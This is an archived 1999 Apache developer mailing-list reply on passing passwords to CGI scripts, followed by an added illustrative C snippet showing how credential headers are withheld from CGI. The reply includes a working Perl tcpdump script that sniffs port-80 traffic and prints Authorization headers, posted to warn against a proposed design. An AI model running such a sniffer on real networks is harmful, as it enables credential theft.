httpd-dev mailing list archives

From "Bill Jones" <b...@fccj.org>
Subject Re: Passing passwords to CGI
Date Wed, 04 Aug 1999 13:25:19 GMT
 Graham wrote:

> Dirk-Willem van Gulik wrote:
> 
>> > Is there a "correct" way of doing this?
>>
>> No, of course not :-) but the solution is
>>
>> Adding to your cflags
>>
>>         CFLAGS += -DSECURITY_HOLE_PASS_AUTHORIZATION
>>
>> Do a grep in the source (util_script.c) for the full story.
>
> Here's a thought - how about including the capability for passwords to
> be inserted into the POST data that a CGI reads via stdin, i.e. the
> password could be read as if it was simply another option on a form.
>
> The name of this POST variable would be configurable so it didn't clash
> with any existing variables in CGI.
>
> Is this a good idea? If so, I'll try to get it to work.
>
> Regards,
> Graham


Here is why you don't want to do that:

#!/usr/bin/perl

$LIMIT = shift || 5000000;

$|=1;
open (STDIN,"/usr/sbin/tcpdump -lnx -s 1024 dst port 80|");
while (<>) {
    if (/^\S/) {
        last unless $LIMIT--;
        while ($packet=~/(GET|POST|WWW-Authenticate|Authorization).+/g)  {
            print "$client -> $host\t$&\n";
        }
        undef $client; undef $host; undef $packet;
        ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
            if /P \d+:\d+\((\d+)\)/ && $1 > 0;
    }
    next unless $client && $host;
    s/\s+//;
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;
    tr/\x1F-\x7E\r\n//cd;
    $packet .= $_;
}


/^HTH$/i;
-Sneex-  :]
______________________________________________________________________
Bill Jones  Data Security Specialist  http://www.fccj.org/cgi/mail?dss
  http://certserver.pgp.com:11371/pks/lookup?op=get&search=0x37EFC00F
  http://www.networksolutions.com/cgi-bin/whois/whois?BJ1936

         Jacksonville Perl Mongers
         http://jacksonville.pm.org
         jax@jacksonville.pm.org
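
The build flag named in the quoted reply exists because the server leaves credential headers out of the environment it hands to CGI scripts. A simplified illustration of that filter follows, added here as an example; it is not code from Apache or from the message above, and the function names and sample headers are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Hypothetical helper: 1 if the header must not reach a CGI script. */
static int is_credential_header(const char *name)
{
#ifdef SECURITY_HOLE_PASS_AUTHORIZATION
    (void)name;
    return 0;   /* opt-in build: credentials are passed through */
#else
    return strcasecmp(name, "Authorization") == 0 ||
           strcasecmp(name, "Proxy-Authorization") == 0;
#endif
}

/* Build the CGI variable name for a request header: HTTP_ prefix,
 * upper case, every non-alphanumeric byte becomes '_'.
 * Returns 0 if the header is withheld or the buffer is too small. */
int cgi_env_name(const char *header, char *out, size_t outlen)
{
    size_t i, n = strlen(header);
    if (is_credential_header(header) || n + 6 > outlen)
        return 0;
    memcpy(out, "HTTP_", 5);
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)header[i];
        out[5 + i] = isalnum(c) ? (char)toupper(c) : '_';
    }
    out[5 + n] = '\0';
    return 1;
}

int main(void)
{
    /* Constructed request headers, not taken from the thread. */
    const char *hdrs[] = { "User-Agent", "Authorization",
                           "proxy-authorization", "Accept-Language" };
    char name[64];
    size_t i;
    for (i = 0; i < sizeof hdrs / sizeof hdrs[0]; i++) {
        if (cgi_env_name(hdrs[i], name, sizeof name))
            printf("exported as %s\n", name);
        else
            printf("withheld from CGI: %s\n", hdrs[i]);
    }
    return 0;
}
```

Compiled without the flag, the two credential headers are withheld; compiled with -DSECURITY_HOLE_PASS_AUTHORIZATION they would be exported like any other header.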
